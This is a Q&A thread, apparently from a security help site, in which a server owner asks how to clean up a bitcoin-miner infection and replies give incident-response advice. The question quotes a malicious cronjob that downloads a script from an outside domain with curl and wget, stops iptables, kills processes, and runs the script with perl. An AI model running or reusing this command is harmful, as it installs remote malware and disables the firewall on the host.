1

I installed Clamav and rootkits detectors and they found nothing.

The virus run a few process named modules that eating cpu, my server vendor told me that it is bitcoin miner virus but they didn't give me any other info. The only thing that I found out is this cronjob:

*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

I killed all the process and removed the cronjob. /tmp folder is empty. The problem is that I didn't find the core "problem". What else can I do?

pri
  • 4,446
  • 24
  • 31
Amir Bar
  • 131
  • 5
  • @Matthew I thought maybe from the cronjob line maybe it some known virus or something? – Amir Bar Jan 09 '17 at 11:39
  • 2
    Not really - compromised servers can change rapidly, so even if there was still something showing at that address, it wouldn't necessarily be the same as what was there when your system got attacked. The advice in the canonical answer is the only safe option - just because you find one virus doesn't mean that there aren't others which are a lot sneakier on there too. I know it's a pain, and seems like a lot of work, but it's virtually impossible to be sure you've wiped out the issue otherwise. – Matthew Jan 09 '17 at 12:00

1 Answers1

2

From what you said, it's hard to tell if the server was hacked via you web app/site, or via some outdated software, or some other way, but some things you could try:

  • Check your apache/nginx logs and try to find suspicious requests.
  • Check versions of server software (web server, perl, php...) and look for outdated versions.
  • Do a portscan with nmap and look for ports that are open but should not be.
  • Do a quick scan with nikto or some other webapp security scanner. Try wpscan if you are using wordpress.
  • Keep monitoring outbound connections and look for suspicious activity.
  • Change your passwords.
  • Ask/pay somebody to assess the security of your web app.

But basically only the log files could pinpoint the root cause. The other methods can identify vulnerabilities, but you can not tell if those were used by the attacker in this case.

pineappleman
  • 2,289
  • 11
  • 21